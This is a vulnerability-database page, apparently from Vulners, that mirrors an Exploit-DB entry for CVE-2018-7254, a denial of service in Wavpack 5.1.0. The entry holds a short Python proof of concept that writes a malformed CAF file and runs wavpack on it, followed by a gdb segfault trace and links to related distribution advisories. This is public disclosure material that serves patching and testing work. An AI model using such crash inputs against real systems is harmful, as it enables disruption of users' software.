Lucene search
K

Wavpack 5.1.0 - Denial of Service

🗓️ 21 Feb 2018 00:00:00Reported by r4xisType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Wavpack 5.1.0 Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Wavpack 5.1.0 - Denial of Service Exploit
21 Feb 201800:00
zdt
FreeBSD
wavpack -- multiple vulnerabilities
9 May 201800:00
freebsd
AlpineLinux
CVE-2018-7254
19 Feb 201823:00
alpinelinux
ArchLinux
[ASA-201802-12] wavpack: arbitrary code execution
23 Feb 201800:00
archlinux
ArchLinux
[ASA-201802-13] lib32-wavpack: arbitrary code execution
23 Feb 201800:00
archlinux
CNVD
WavPack ParseCaffHeaderConfig Function Denial of Service Vulnerability
22 Feb 201800:00
cnvd
CVE
CVE-2018-7254
19 Feb 201823:00
cve
Cvelist
CVE-2018-7254
19 Feb 201823:00
cvelist
Debian
[SECURITY] [DSA 4125-1] wavpack security update
27 Feb 201820:32
debian
Debian
[SECURITY] [DSA 4125-1] wavpack security update
27 Feb 201820:32
debian
Rows per page
# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage:  http://www.wavpack.com/
# Software Links:   http://www.wavpack.com/downloads.html
#                   https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on:    Debian 9.3.0 64 bit
#               Windows 7 32 bit and 64 bit
#               Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26


import os

head = "\x63\x61\x66\x66"
version = "\x00\x01"
junk1 = "\x00"*(0xa0-6)
crash = "\x80"
junk2 = "\x00"*100

f=open("poc.caf", 'w')
f.write(head+version+junk1+crash+junk2)
f.close()

os.system("wavpack poc.caf")

'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
    at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333	../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2018 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 26.8
CVSS 37.8
EPSS0.19758
37